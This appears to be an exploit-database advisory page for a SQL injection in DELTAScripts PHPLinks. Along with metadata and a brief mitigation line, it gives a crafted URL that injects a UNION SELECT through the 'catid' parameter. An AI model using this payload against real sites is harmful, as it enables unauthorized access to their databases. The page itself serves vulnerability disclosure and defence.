header-logo
Suggest Exploit
vendor:
DELTAScripts PHPLinks
by:
Hamza 'MizoZ' N.
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DELTAScripts PHPLinks
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

DELTAScripts PHPLinks

Vulnerability is in the $_GET['catid'], an attacker can exploit this vulnerability by sending a crafted URL like http://server/[PATH]/index.php?catid=8+union+all+select+1,2,3,4,5,6--

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

/*

Name : DELTAScripts PHPLinks
Vuln : SQL Injection

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com
WebSite : www.greymen.org<http://www.greymen.org/>

Greetz : Zuka, all friends & arab hackers

*/

Vulnerability is in the $_GET['catid']

http://server/[PATH]/index.php?catid=8+union+all+select+1,2,3,4,5,6--